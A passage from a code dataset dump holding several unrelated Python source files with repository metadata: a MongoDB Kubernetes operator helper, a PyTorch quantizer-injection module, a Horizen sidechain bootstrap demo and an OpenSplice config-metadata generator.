'localhost:27017/admin',\n '--ssl',\n '--sslCAFile', '/etc/ssl/mongod/ca.pem',\n '--sslPEMKeyFile', '/etc/ssl/mongod/mongod.pem',\n '--eval', '{}'.format(mongo_command)]\n exec_resp = stream(core_api.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n command=exec_cmd,\n container='mongod',\n stderr=True,\n stdin=False,\n stdout=True,\n tty=False)\n\n if 'Successfully added user: {' in exec_resp:\n logging.info('created users for {} in ns/{}'.format(\n name, namespace))\n return True\n elif \"Error: couldn't add user: not master :\" in exec_resp:\n # most of the time member-0 is 
elected master\n # if it is not we get this error and need to\n # loop through members until we find the master\n continue\n else:\n logging.error('error creating users for {} in ns/{}\\n{}'.format(\n name, namespace, exec_resp))\n return False\n","repo_name":"kbst/mongodb","sub_path":"mongodb_operator/mongodb_operator/mongodb_helpers.py","file_name":"mongodb_helpers.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"66"} +{"seq_id":"26318972510","text":"from typing import Dict, Tuple, List\n\nimport torch as t\nfrom omegaconf import OmegaConf, DictConfig\n\nfrom apputil import load_obj\nfrom .func import DefaultQuantizedModuleMapping, QUAN_MODULE_MAPPING_TYPE\nfrom .quantizer import Quantizer, IdentityQuantizer\n\n\ndef quantizer(cfg_quantizer: DictConfig) -> Quantizer:\n c = dict(cfg_quantizer)\n if c['class_name']:\n q = load_obj(c['class_name'], default_obj_path='neuralzip.quantizer')\n else:\n q = IdentityQuantizer\n return q(**c['params'])\n\n\ndef _replace_module_by_names(model: t.nn.Module,\n modules_to_replace: Dict[str, t.nn.Module],\n quantized_module_mapping: QUAN_MODULE_MAPPING_TYPE) -> t.nn.Module:\n def helper(child: t.nn.Module):\n for n, c in child.named_children():\n if type(c) in quantized_module_mapping.keys():\n for full_name, m in model.named_modules():\n if c is m and full_name in modules_to_replace:\n child.add_module(n, modules_to_replace.pop(full_name))\n break\n else:\n helper(c)\n\n helper(model)\n return model\n\n\ndef quantizer_inject(\n model: t.nn.Module,\n cfg_quan: DictConfig,\n quantized_module_mapping: QUAN_MODULE_MAPPING_TYPE = DefaultQuantizedModuleMapping\n) -> t.nn.Module:\n # Find modules to quantize\n modules_to_replace = dict()\n for name, module in model.named_modules():\n if type(module) in quantized_module_mapping.keys():\n if cfg_quan.excepts is not None and name in cfg_quan.excepts:\n cfg_quan_weight = OmegaConf.merge(cfg_quan.weight, cfg_quan.excepts[name].weight)\n cfg_quan_act = OmegaConf.merge(cfg_quan.act, cfg_quan.excepts[name].act)\n else:\n cfg_quan_weight = cfg_quan.weight\n cfg_quan_act = cfg_quan.act\n if cfg_quan_weight['class_name'] or cfg_quan_act['class_name']:\n mapped_module = quantized_module_mapping[type(module)]\n modules_to_replace[name] = mapped_module(\n module,\n quan_w_fn=quantizer(cfg_quan_weight),\n quan_a_fn=quantizer(cfg_quan_act)\n )\n elif cfg_quan.excepts is not None and name in cfg_quan.excepts:\n raise KeyError('Cannot find module %s in the model', name)\n\n quantized_model = _replace_module_by_names(model, modules_to_replace, quantized_module_mapping)\n return quantized_model\n\n\ndef quantizer_stat(model: t.nn.Module) -> Tuple[int, Dict[str, List[str]]]:\n quan_dict = dict()\n quan_cnt = 0\n for n, m in model.named_modules():\n if isinstance(m, Quantizer):\n quan_cnt += 1\n quan_name = str(type(m))\n quan_dict[quan_name] = quan_dict.get(quan_name, []) + [n]\n return quan_cnt, quan_dict\n","repo_name":"zhutmost/neuralzip","sub_path":"neuralzip/quantizer_inject.py","file_name":"quantizer_inject.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"66"} +{"seq_id":"4566195987","text":"#!/usr/bin/env python3\nimport json\nimport logging\nimport os\nimport time\n\nfrom SidechainTestFramework.sc_boostrap_info import SCNodeConfiguration, SCCreationInfo, \\\n MCConnectionInfo, SCBootstrapInfo, NO_KEY_ROTATION_CIRCUIT\nfrom 
SidechainTestFramework.sc_test_framework import SidechainTestFramework\nfrom test_framework.util import assert_equal, assert_true, start_nodes, \\\n websocket_port_by_mc_node_index, initialize_chain_clean, connect_nodes_bi, COIN\nfrom SidechainTestFramework.scutil import start_sc_nodes, \\\n generate_secrets, generate_vrf_secrets, generate_certificate_proof_info, \\\n bootstrap_sidechain_node, generate_next_blocks, launch_bootstrap_tool, cert_proof_keys_paths, \\\n csw_proof_keys_paths, generate_csw_proof_info\n\n\"\"\"\nDemo flow of how to bootstrap SC network and start SC nodes.\n\nConfiguration: 2 MC nodes\n\nTest:\n - Bootstrap SC network\n - Start 1 SC node connected to MC\n - Do FT\n - Do sidechain internal transaction\n - Do BT\n\"\"\"\n\n# set this constant to False for not having an interactive behaviour\nINTERACTIVE = True\n\n\nclass Demo(SidechainTestFramework):\n\n def setup_chain(self):\n initialize_chain_clean(self.options.tmpdir, 2)\n\n def setup_network(self, split=False):\n # Setup nodes and connect them\n self.nodes = self.setup_nodes()\n connect_nodes_bi(self.nodes, 0, 1)\n self.sync_all()\n\n def setup_nodes(self):\n return start_nodes(2, self.options.tmpdir)\n\n def sc_setup_chain(self):\n return\n\n def sc_setup_nodes(self):\n return\n\n def sc_setup_network(self, split=False):\n return\n\n def run_test(self):\n # Activate Sidechains fork\n mc_node = self.nodes[0]\n mc_node_miner = self.nodes[1]\n mc_node.generate(20) # Generate first 20 block by main MC node to get some reward coins\n self.sync_all()\n mc_node_miner.generate(400) # Generate the rest by another node.\n self.sync_all()\n logging.info(\"MC Node started.\")\n\n mc_height = mc_node.getblockcount()\n logging.info(\"MC chain height is \" + str(mc_height) + \". Sidechains fork activated.\\n\")\n\n self.pause()\n\n # Declare SC creation output tx\n logging.info(\"\\nDeclaring new Sidechain in MC network.\")\n sc_node_configuration = SCNodeConfiguration(\n MCConnectionInfo(address=\"ws://{0}:{1}\".format(mc_node.hostname, websocket_port_by_mc_node_index(0)))\n )\n\n creation_amount = 100 # Zen\n withdrawal_epoch_length = 10\n sc_creation_info = SCCreationInfo(mc_node, creation_amount, withdrawal_epoch_length)\n accounts = generate_secrets(\"seed\", 1, self.model)\n vrf_keys = generate_vrf_secrets(\"seed\", 1, self.model)\n genesis_account = accounts[0]\n vrf_key = vrf_keys[0]\n ps_keys_dir = os.getenv(\"SIDECHAIN_SDK\", \"..\") + \"/qa/ps_keys\"\n if not os.path.isdir(ps_keys_dir):\n os.makedirs(ps_keys_dir)\n\n cert_keys_paths = cert_proof_keys_paths(ps_keys_dir)\n\n certificate_proof_info = generate_certificate_proof_info(\"seed\", 7, 5, cert_keys_paths, True,\n NO_KEY_ROTATION_CIRCUIT, self.model)\n\n csw_keys_paths = csw_proof_keys_paths(ps_keys_dir, sc_creation_info.withdrawal_epoch_length)\n csw_vr_key = generate_csw_proof_info(withdrawal_epoch_length, csw_keys_paths, self.model)\n\n custom_data = vrf_key.publicKey\n fe_certificate_field_configs = [255, 255]\n\n cmdInput = {\n \"version\": 0,\n \"withdrawalEpochLength\": withdrawal_epoch_length,\n \"toaddress\": genesis_account.publicKey,\n \"amount\": sc_creation_info.forward_amount,\n \"wCertVk\": certificate_proof_info.verificationKey,\n \"customData\": custom_data,\n \"constant\": certificate_proof_info.genSysConstant,\n \"wCeasedVk\": csw_vr_key,\n \"vFieldElementCertificateFieldConfig\": fe_certificate_field_configs\n }\n logging.info(\"Running sc_create RPC call on MC node:\\n\" +\n 'sc_create {} '.format(json.dumps(cmdInput, indent=4, 
sort_keys=True)))\n logging.info(\n \"where arguments are:\\nwithdrawal epoch length - {}\\nfirst Forward Transfer receiver address in the \"\n \"Sidechain - {}\\nfirst Forward Transfer amount - {} ({} Zen)\\nwithdrawal certificate verification key \"\n \"- {}\\nfirst ForgerBox VRF public key - {}\\nwithdrawal certificate Snark proof public input - {}\\n\".format(\n withdrawal_epoch_length, genesis_account.publicKey, sc_creation_info.forward_amount * COIN,\n sc_creation_info.forward_amount,\n certificate_proof_info.verificationKey, custom_data, certificate_proof_info.genSysConstant))\n\n self.pause()\n\n # Create Tx and Block\n sc_create_res = mc_node.sc_create(cmdInput)\n\n transaction_id = sc_create_res[\"txid\"]\n logging.info(\"Sidechain creation transaction Id - {0}\".format(transaction_id))\n\n sidechain_id = sc_create_res[\"scid\"]\n logging.info(\"Sidechain created with Id - {0}\\n\".format(sidechain_id))\n\n logging.info(\"Generating Block with sidechain creation transaction...\")\n block_id = mc_node.generate(1)[0]\n logging.info(\"Block id - {}\\n\".format(block_id))\n\n self.pause()\n\n # Declare SC genesis data config info\n logging.info(\"\\nPreparing Sidechain network configuration.\")\n logging.info(\n \"Running getscgenesisinfo RPC call on MC to get the Sidechain related data for genesis block generation:\\n\" +\n 'getscgenesisinfo \"{}\"'.format(sidechain_id))\n\n genesis_info = [mc_node.getscgenesisinfo(sidechain_id), mc_node.getblockcount(), sidechain_id]\n\n jsonParameters = {\n \"secret\": genesis_account.secret,\n \"vrfSecret\": vrf_key.secret,\n \"info\": genesis_info[0],\n \"regtestBlockTimestampRewind\": 720 * 120 * 5\n }\n jsonNode = launch_bootstrap_tool(\"genesisinfo\", jsonParameters, self.model)\n logging.info(\"\\nCalculating Sidechain network genesis data using ScBootstrappingTool command:\\n\" +\n \"genesisinfo {}\\n\".format(json.dumps(jsonParameters, indent=4, sort_keys=True)) +\n \"where arguments are:\\ninfo - genesis info retrieved from MC on previous step\\nsecret and vrfSecret - private part the corresponds first FT data in sc_create RPC call.\\n\")\n\n self.pause()\n\n # Result of genesis data config info\n logging.info(\"Result:\\n {}\".format(json.dumps(jsonNode, indent=4, sort_keys=True)))\n genesis_data = jsonNode\n\n sidechain_id = genesis_info[2]\n\n sc_bootstrap_info = SCBootstrapInfo(sidechain_id, genesis_account, sc_creation_info.forward_amount,\n genesis_info[1],\n genesis_data[\"scGenesisBlockHex\"], genesis_data[\"powData\"],\n genesis_data[\"mcNetwork\"],\n sc_creation_info.withdrawal_epoch_length, vrf_key, certificate_proof_info,\n genesis_data[\"initialCumulativeCommTreeHash\"], cert_keys_paths,\n csw_keys_paths)\n\n bootstrap_sidechain_node(self.options.tmpdir, 0, sc_bootstrap_info, sc_node_configuration)\n\n self.pause()\n\n # Start SC info\n logging.info(\"\\nStarting Sidechain node...\")\n self.sc_nodes = start_sc_nodes(1, self.options.tmpdir)\n\n sc_node = self.sc_nodes[0]\n\n initial_sc_balance = sc_node.wallet_coinsBalance()[\"result\"]\n logging.info(\"\\nInitial SC wallet balance in satoshi: {}\".format(\n json.dumps(initial_sc_balance, indent=4, sort_keys=True)))\n\n initial_boxes_balances = sc_node.wallet_allBoxes()[\"result\"]\n logging.info(\n \"\\nInitial SC wallet boxes: {}\".format(json.dumps(initial_boxes_balances, indent=4, sort_keys=True)))\n\n self.pause()\n\n # MC balance before FT\n logging.info(\"\\n MC total balance before Forward Transfer is {} Zen\".format(mc_node.getbalance()))\n\n self.pause()\n\n # Do 
FT\n sc_address = sc_node.wallet_createPrivateKey25519()[\"result\"][\"proposition\"][\"publicKey\"]\n ft_amount = 5\n mc_return_address = mc_node.getnewaddress()\n cmdInput = [{'toaddress': sc_address, 'amount': ft_amount, \"scid\": sc_bootstrap_info.sidechain_id,\n \"mcReturnAddress\": mc_return_address}]\n logging.info(\n \"\\nCreating Forward Transfer with {} satoshi ({} Zen) to Sidechain:\\n\".format(ft_amount * COIN, ft_amount) +\n 'sc_send {}'.format(json.dumps(cmdInput, indent=4, sort_keys=True)))\n\n self.pause()\n\n ft_tx_id = mc_node.sc_send(cmdInput)\n logging.info(\"\\nFT transaction id - {}\".format(ft_tx_id))\n\n # Generate MC block and SC block and check that FT appears in SC node wallet\n logging.info(\"Generating MC Block with Forward Transfer...\")\n self.sync_all()\n mcblock_hash1 = mc_node_miner.generate(1)[0]\n self.sync_all()\n logging.info(\"MC Block id - {}\\n\".format(mcblock_hash1))\n logging.info(\"Generating SC Block to include MC Block Forward Transfer...\")\n scblock_id1 = generate_next_blocks(sc_node, \"first node\", 1)[0]\n\n self.pause()\n\n # MC balance after FT\n logging.info(\"\\n MC total balance after Forward Transfer is {} Zen\".format(mc_node.getbalance()))\n\n self.pause()\n\n # Check balance changes\n sc_balance = sc_node.wallet_coinsBalance()[\"result\"]\n logging.info(\"\\nSC wallet balance in satoshi: {}\".format(\n json.dumps(sc_balance, indent=4, sort_keys=True)))\n\n boxes_balances = sc_node.wallet_allBoxes()[\"result\"]\n logging.info(\"\\nSC wallet boxes: {}\".format(json.dumps(boxes_balances, indent=4, sort_keys=True)))\n\n self.pause()\n\n # Do inchain coins send\n sc_send_amount = 1 # Zen\n logging.info(\"\\nSending {} satoshi ({} Zen) inside sidechain...\".format(sc_send_amount * COIN, sc_send_amount))\n sc_address = sc_node.wallet_allPublicKeys()[\"result\"][\"propositions\"][-1][\"publicKey\"]\n logging.info(sc_address)\n self.send_coins(sc_node, sc_address, sc_send_amount * COIN, 100)\n\n logging.info(\"Generating SC Block with send coins transaction...\")\n scblock_id2 = generate_next_blocks(sc_node, \"first node\", 1)[0]\n\n self.pause()\n\n # Check balance changes\n sc_balance = sc_node.wallet_coinsBalance()[\"result\"]\n logging.info(\"\\nSC wallet balance in satoshi: {}\".format(\n json.dumps(sc_balance, indent=4, sort_keys=True)))\n\n boxes_balances = sc_node.wallet_allBoxes()[\"result\"]\n logging.info(\"\\nSC wallet boxes: {}\".format(json.dumps(boxes_balances, indent=4, sort_keys=True)))\n\n # Do BT\n self.pause()\n mc_address = mc_node.getnewaddress()\n bt_amount = 2 # Zen\n withdrawal_request = {\"outputs\": [\n {\"mainchainAddress\": mc_address,\n \"value\": bt_amount * COIN}\n ]\n }\n\n logging.info(\"\\nCreating Backward Transfer request to withdraw {} satoshi ({} Zen) to the Mainchain...\".format(\n bt_amount * COIN, bt_amount))\n sc_node.transaction_withdrawCoins(json.dumps(withdrawal_request))\n\n logging.info(\"Generating SC Block with Backward Transfer request transaction...\")\n scblock_id3 = generate_next_blocks(sc_node, \"first node\", 1)[0]\n\n self.pause()\n\n # Run block generation till epoch end -> automatic block generation\n logging.info(\"Generating 9 more MC blocks to finish withdrawal epoch for the Sidechain...\")\n mc_block_ids = mc_node.generate(9)\n logging.info(\"MC Block ids - {}\\n\".format(mc_block_ids))\n logging.info(\n \"Generating SC blocks to synchronize MC blocks and automatically start creation of Withdrawal Certificate...\")\n sc_block_ids = generate_next_blocks(sc_node, \"first node\", 
4)\n logging.info(\"\\nGenerating Withdrawal Certificate...\\n\")\n\n time.sleep(10)\n while mc_node.getmempoolinfo()[\"size\"] == 0 and sc_node.submitter_isCertGenerationActive()[\"result\"][\"state\"]:\n logging.info(\"Wait for withdrawal certificate in MC memory pool...\")\n time.sleep(2)\n assert_equal(1, mc_node.getmempoolinfo()[\"size\"], \"Certificate was not added to Mc node mempool.\")\n\n certHash = mc_node.getrawmempool()[0]\n logging.info(\"Withdrawal certificate hash - \" + certHash)\n cert = mc_node.getrawtransaction(certHash, 1)\n logging.info(\"Withdrawal certificate - {}\".format(json.dumps(cert, indent=4, sort_keys=True, default=str)))\n\n self.pause()\n\n # Check MC balance for BT destination address before Certificate inclusion\n mc_balance_before_cert = mc_node.getreceivedbyaddress(mc_address)\n logging.info(\"\\nMC address {} balance before Certificate inclusion is = {:.8f} Zen.\".format(mc_address,\n mc_balance_before_cert))\n\n self.pause()\n\n # Generate MC block to include the certificate\n logging.info(\"\\nGenerating 1 more MC block to include Withdrawal certificate in the chain...\")\n mc_block_4 = mc_node.generate(1)[0]\n logging.info(\"MC Block id - {}\\n\".format(mc_block_4))\n\n self.pause()\n\n # Check MC balance for BT destination address before Certificate inclusion\n mc_balance_after_cert = mc_node.getreceivedbyaddress(mc_address)\n logging.info(\"\\nMC address {} balance after Certificate inclusion is = {:.8f} Zen.\".format(mc_address,\n mc_balance_after_cert))\n\n self.pause()\n\n # Get SC balances changes\n sc_balance = sc_node.wallet_coinsBalance()[\"result\"]\n logging.info(\"\\nSC wallet balance in satoshi: {}\".format(\n json.dumps(sc_balance, indent=4, sort_keys=True)))\n boxes_balances = sc_node.wallet_allBoxes()[\"result\"]\n logging.info(\"\\nSC wallet boxes: {}\".format(json.dumps(boxes_balances, indent=4, sort_keys=True)))\n\n self.pause()\n\n def pause(self):\n if INTERACTIVE == True:\n input(\"Press the key to continue...\")\n pass\n\n def send_coins(self, sc_node, receiver, amount, fee):\n j = {\"outputs\": [{\n \"publicKey\": receiver,\n \"value\": amount\n }],\n \"fee\": fee,\n }\n request = json.dumps(j)\n txid = sc_node.transaction_sendCoinsToAddress(request)[\"result\"][\"transactionId\"]\n return txid\n\n\nif __name__ == \"__main__\":\n Demo().main()\n","repo_name":"HorizenOfficial/Sidechains-SDK","sub_path":"qa/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":14972,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"66"} +{"seq_id":"7037208466","text":"#!/usr/bin/env python\n# This script extracts service-configuration from a source file and merges it with the OpenSplice\n# meta-config XML file. 
The source-file needs to adhere to the DDSI2-style configuration backend.\n\n# Any data that already exists is overwritten unless the element or attribute XPath is in blacklist\n#\n# Requires: clang, lxml, asciitree==0.2\n\nimport sys\nimport os\n\nimport clang.cindex\nfrom clang.cindex import CursorKind\n\nfrom lxml import etree\nfrom pprint import pprint\n\n# Cfgelem data imported from C can be ignored if name appears on blacklist\n# Note: 'name' is treated as a mandatory field of struct cfgelem\nblacklist = [\n \"Domain\" # Don't generate meta-config for Domain tag, it only exists for retrieving parameters (lease etc)\n]\n\ntypehints = {\n \"uf_nopstring\": {\n \"xmltype\": \"String\"\n },\n \"uf_boolean\": {\n \"xmltype\": \"Boolean\"\n },\n \"uf_tracingOutputFileName\": {\n \"xmltype\": \"String\",\n \"dimension\": \"file path\"\n },\n \"uf_verbosity\": {\n \"xmltype\": \"Enum\",\n \"values\": [ \"finest\", \"finer\", \"fine\", \"config\", \"info\", \"warning\", \"severe\", \"none\" ]\n },\n \"uf_logcat\": { \"xmltype\": \"String\" },\n \"uf_float\": { \"xmltype\": \"Float\" },\n \"uf_timeReal\": { \"xmltype\": \"Float\" },\n \"uf_int32\": { \"xmltype\": \"Int\" },\n \"uf_sched_prio_class\": {\n \"xmltype\": \"Enum\",\n \"values\": [ \"relative\", \"absolute\" ]\n },\n \"uf_sched_class\": {\n \"xmltype\": \"Enum\",\n \"values\": [ \"realtime\", \"timeshare\", \"default\"]\n }\n}\n\n# todo: Should this be part of struct cfgelem?\n# In case of cmagent, everything is community so hard-code it for now\nVERSION=\"COMMUNITY\"\n\nclass CfgElem(object):\n # This class represents the cfgelem struct in python\n def __init__(self, name):\n self.name = name\n\n def __eq__(self, other):\n # This should not be used to compare things that have the same name but a different parent!\n return self.name == other.name\n\n def __str__(self):\n str = \"Name: {}\\n\".format(self.name)\n if self.children:\n str += \" Children: {}\\n\".format(\", \".join(x.name for x in self.children))\n else:\n str += \" XML Type: leaf{}\\n\".format(self.typehint[\"xmltype\"])\n if self.attributes:\n str += \" Attributes: {}\\n\".format(\", \".join(x.name for x in self.attributes))\n str += \" Multiplicity: {}\\n\".format(self.multiplicity)\n str += \" Default: {}\\n\".format(self.default)\n str += \" Description: {}\".format(self.description)\n return str\n\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, name):\n self.__name = sanitizeString(name)\n\n @property\n def children(self):\n return self.__children\n\n @children.setter\n def children(self, children):\n self.__children = children\n\n @property\n def attributes(self):\n return self.__attrs\n\n @attributes.setter\n def attributes(self, attrs):\n if attrs:\n for attr in attrs:\n assert not attr.children and not attr.attributes, \\\n \"Attribute cannot have children or attributes\"\n self.__attrs = attrs\n\n @property\n def multiplicity(self):\n return self.__multiplicity\n\n @multiplicity.setter\n def multiplicity(self, multiplicity):\n self.__multiplicity = int(multiplicity)\n\n @property\n def default(self):\n return self.__default\n\n @default.setter\n def default(self, default):\n self.__default = sanitizeString(default)\n\n @property\n def description(self):\n return self.__description\n\n @description.setter\n def description(self, description):\n self.__description = sanitizeString(description)\n\n @property\n def typehint(self):\n return self.__typehint\n\n @typehint.setter\n def typehint(self, hint):\n if hint:\n assert not 
self.children, \\\n \"group element {} should not have typehint ({})\".format(self.name, hint)\n assert hint in typehints, \\\n \"typehint '{}' for leaf element {} is unknown\".format(hint, self.name)\n self.__typehint = typehints[hint]\n else:\n self.__typehint = None\n\ndef sanitizeString(strval):\n # Used for optional string-literals (parsed from C code)\n if strval:\n assert strval.startswith('\"') and strval.endswith('\"'), \\\n \"Expected double-quoted string-literal, got '{}'\".format(strval)\n return strval[1:-1].replace('\\\\n', '').replace('\\\\\"', '\"')\n else:\n return None\n\ndef print_cfgelem_ast(translation_unit):\n # for debugging\n import asciitree # must be v0.2, newer doesn't work!\n for cursor in tu.cursor.get_children():\n if (cursor.kind == CursorKind.VAR_DECL and\n cursor.type.spelling.startswith(\"const struct cfgelem\")):\n asciitree.draw_tree(cursor,\n lambda n: n.get_children(),\n lambda n: \"{} ({}) at {}\".format(n.spelling or n.displayname,\n str(n.kind).split(\".\")[1],\n n.extent))\n\ndef findOrCreateElement(expr, parent, tagname, name_attr=None):\n r = parent.xpath(expr)\n if r:\n # sanity-check the existing XML\n assert len(r) == 1, \\\n \"Multiple ({}) occurrences of {} are not allowed!\".format(len(r))\n print(\"Merge {} in {}\".format(expr[2:], parent.getroottree().getpath(parent)[1:]))\n return r[0]\n else:\n print(\"Insert {} in {}\".format(expr[2:], parent.getroottree().getpath(parent)[1:]))\n if name_attr:\n return etree.SubElement(parent, tagname, name=name_attr)\n else:\n return etree.SubElement(parent, tagname)\n\ndef doSimpleElement(tagname, parent_element, source=None, as_cdata=False):\n # if source-data available, find or create a new element and set source-data as text\n # if source-data is None, find and remove element\n\n if not source is None:\n # Use source as text-data for child-element 'tagname'\n child = findOrCreateElement(\"./{}\".format(tagname), parent_element, tagname)\n if as_cdata:\n data = etree.CDATA(source)\n else:\n data = source\n\n if child.text and child.text != source:\n print(\"Replace '{}' text\".format(tagname))\n child.text = data\n else:\n # Remove child-element 'tagname' if it exists\n r = parent_element.xpath(\"./{}\".format(tagname))\n if r:\n assert len(r) == 1, \\\n \"Multiple ({}) occurrences of '{}' are not allowed!\".format(len(r))\n print(\"Remove '{}'\".format(tagname))\n parent_element.remove(r[0])\n\ndef doLeafElement(element, ce):\n # process content common for attribute-leafs and element-leafs\n\n # default\n doSimpleElement(\"default\", element, ce.default, False)\n\n # dimension\n dimension = ce.typehint.get(\"dimension\", None)\n doSimpleElement(\"dimension\", element, dimension, False)\n\n # Leaf-kind specific child(s)\n if ce.typehint[\"xmltype\"] == \"Enum\":\n # enum values\n r = element.xpath(\"./value\")\n values = list(ce.typehint[\"values\"]) # copy list for removals\n if r:\n for value_element in r:\n if not value_element.text in values:\n print(\"Remove enum value {}\".format(value_element.text))\n element.remove(value_element)\n else:\n values.remove(value_element.text)\n\n for value in values:\n print(\"Insert enum value {}\".format(value))\n value_element = etree.SubElement(element, \"value\")\n value_element.text = value\n\n elif (ce.typehint[\"xmltype\"] == \"Int\" or\n ce.typehint[\"xmltype\"] == \"Float\"):\n # minimum\n minimum = ce.typehint.get(\"minimum\")\n doSimpleElement(\"minimum\", element, minimum, False)\n\n # maximum\n maximum = ce.typehint.get(\"maximum\")\n 
doSimpleElement(\"maximum\", element, maximum, False)\n elif ce.typehint[\"xmltype\"] == \"String\":\n # maxLength\n maxlength = ce.typehint.get(\"maxlength\") or \"0\"\n doSimpleElement(\"maxLength\", element, maxlength, False)\n\ndef groupToXML(group, parent):\n # Remove XML elements that are not in group, unless parent is splice_meta_config\n # since this script only handles service-config and not the entire config tree...\n\n if parent.tag != \"splice_meta_config\":\n for e in parent.getchildren():\n if (\"name\" in e.attrib and\n not e.tag.startswith(\"attribute\")):\n ce = filter(lambda x: x.name == e.attrib[\"name\"], group)[:1]\n if len(ce) == 0:\n print(\"Remove {}[@name='{}'] {}\".format(e.tag, e.attrib[\"name\"], parent.tag))\n parent.remove(e)\n\n for ce in group:\n if not ce.name in blacklist:\n # element or leaf\n tagname = \"element\" if ce.children else \"leaf{}\".format(ce.typehint[\"xmltype\"])\n expr = \"./{}[@name='{}']\".format(tagname, ce.name)\n element = findOrCreateElement(expr, parent, tagname, ce.name)\n # version attr\n if \"version\" in element.attrib and element.attrib[\"version\"] != VERSION:\n print(\"Replace version attribute {} -> {}\".format(element.attrib[\"version\"], VERSION))\n element.attrib[\"version\"] = VERSION\n # minOccurrences attr\n if ce.multiplicity == 1:\n if ce.children or ce.attributes:\n min = 0\n elif not ce.default:\n min = 1\n else:\n min = 0\n else:\n min = ce.multiplicity\n if \"minOccurrences\" in element.attrib and element.attrib[\"minOccurrences\"] != str(min):\n print(\"Replace minOccurrences attribute {} -> {}\".format(element.attrib[\"minOccurrences\"],\n min))\n element.attrib[\"minOccurrences\"] = str(min)\n # maxOccurrences attr\n if \"maxOccurrences\" in element.attrib and element.attrib[\"maxOccurrences\"] != str(ce.multiplicity):\n print(\"Replace maxOccurrences attribute {} -> {}\".format(element.attrib[\"maxOccurrences\"],\n ce.multiplicity))\n element.attrib[\"maxOccurrences\"] = str(ce.multiplicity)\n\n # comment child\n doSimpleElement(\"comment\", element, ce.description, True)\n\n # attribute childs\n # remove unused from XML\n for e in element.getchildren():\n if (e.tag.startswith(\"attribute\") and\n \"name\" in e.attrib):\n attr_ce = filter(lambda x: (e.tag == \"attribute{}\".format(x.typehint[\"xmltype\"]) and\n e.attrib[\"name\"] == x.name), ce.attributes)[:1]\n if len(attr_ce) == 0:\n print(\"Remove {}[@name={}]\".format(e.tag, e.attrib[\"name\"]))\n element.remove(e)\n if ce.attributes:\n for attr_ce in ce.attributes:\n # attribute element\n tagname = \"attribute{}\".format(attr_ce.typehint[\"xmltype\"])\n expr = \"./{}[@name='{}']\".format(tagname, attr_ce.name)\n attr_element = findOrCreateElement(expr, element, tagname, attr_ce.name)\n # version attr\n if \"version\" in attr_element.attrib and attr_element.attrib[\"version\"] != VERSION:\n print(\"Replace version attribute {} -> {}\".format(attr_element.attrib[\"version\"],\n VERSION))\n attr_element.attrib[\"version\"] = VERSION\n # required attr\n required = \"true\" if attr_ce.multiplicity > 0 else \"false\"\n if \"required\" in attr_element.attrib and attr_element.attrib[\"required\"] != required:\n print(\"Replace required attribute {} -> {}\".format(attr_element.attrib[\"required\"],\n required))\n attr_element.attrib[\"required\"] = required\n\n # comment\n doSimpleElement(\"comment\", attr_element, attr_ce.description, True)\n\n # remaining (leaf-specific) elements\n doLeafElement(attr_element, attr_ce)\n\n if not ce.children:\n # Remove existing 
element childs\n r = element.xpath(\"./element\")\n if r:\n for e in r:\n print(\"CHILD Remove {}[@name={}]\".format(child.tag, child.attrib[\"name\"]))\n element.remove(e)\n\n # remaining (leaf-specific) elements\n doLeafElement(element, ce)\n\n else:\n groupToXML(ce.children, element)\n else:\n print(\"Skipping blacklisted cfgelem '{}'\".format(ce.name))\n\ndef extract(translation_unit):\n groups = {} # key: group-name, value: list of CfgElem\n\n for cursor in tu.cursor.get_children():\n # Filter variable declarations of type 'const struct cfgelem'\n if (cursor.kind == CursorKind.VAR_DECL and\n cursor.type.spelling.startswith(\"const struct cfgelem\")):\n\n cfgelem_decl = list(cursor.get_children())\n # expected: cfgelem typeref + initializer-list expr\n assert len(cfgelem_decl) == 2, \\\n \"expected two children, got {}\".format(len(cfgelem_decl))\n assert cfgelem_decl[0].kind == CursorKind.TYPE_REF, \\\n \"expected first child to be type-ref, got {}\".format(cfgelem_decl[0].kind)\n assert cfgelem_decl[0].spelling == \"struct cfgelem\", \\\n \"expected struct cfgelem type-ref, got '{}'\".format(cfgelem_decl[0].spelling or\n cfgelem_decl[0].displayname)\n\n for elem in cfgelem_decl[1].get_children():\n if elem.kind == CursorKind.INIT_LIST_EXPR:\n #print(\"Processing member of cfgelem group '{}'\".format(cursor.spelling))\n\n # Find existing group or create a new empty group\n if cursor.spelling not in groups:\n groups[cursor.spelling] = []\n group = groups[cursor.spelling]\n\n members = list(elem.get_children())\n assert len(members) == 12, \\\n \"expected struct with 12 members, got {} members\".format(len(members))\n\n # const char *name\n member = members[0].get_children().next().get_children().next()\n if member.kind == CursorKind.STRING_LITERAL:\n name = member.spelling\n if name == \"\\\"*\\\"\":\n #print(\"Skipping wildcard\")\n continue\n elif member.kind == CursorKind.CSTYLE_CAST_EXPR:\n # assume END_MARKER, anything else should have a name\n #print(\"Skipping end-marker\")\n continue\n else:\n assert False, \\\n \"Unsupported member kind {}\".format(member.kind)\n ce = CfgElem(name)\n\n # const struct cfgelem *children\n member = members[1].get_children().next()\n if member.spelling:\n assert member.spelling != cursor.spelling, \\\n \"cfgelem '{}' cannot be in group '{}' (must be unique)\".format(member.spelling,\n cursor.spelling)\n assert member.spelling in groups, \\\n \"element group {} is unknown\".format(member.spelling)\n ce.children = groups.pop(member.spelling)\n else:\n ce.children = None # This cfgelem has no children\n\n # const struct cfgelem *attributes\n member = members[2].get_children().next()\n if member.spelling:\n assert member.spelling != cursor.spelling, \\\n \"cfgelem '{}' cannot be in group '{}' (must be unique)\".format(member.spelling,\n cursor.spelling)\n assert member.spelling in groups, \\\n \"attribute group {} is unknown\".format(member.spelling)\n ce.attributes = groups.pop(member.spelling)\n else:\n ce.attributes = None # This cfgelem has no attributes\n\n # int multiplicity\n member = members[3]\n assert member.kind == CursorKind.INTEGER_LITERAL, \\\n \"expected multiplicity integer-literal, member has kind {}\".format(member.kind)\n ce.multiplicity = list(member.get_tokens())[0].spelling\n\n # const char *default\n member = members[4].get_children().next()\n if member.kind == CursorKind.UNEXPOSED_EXPR:\n member = member.get_children().next()\n assert member.kind == CursorKind.STRING_LITERAL, \\\n \"expected default string-literal, member has 
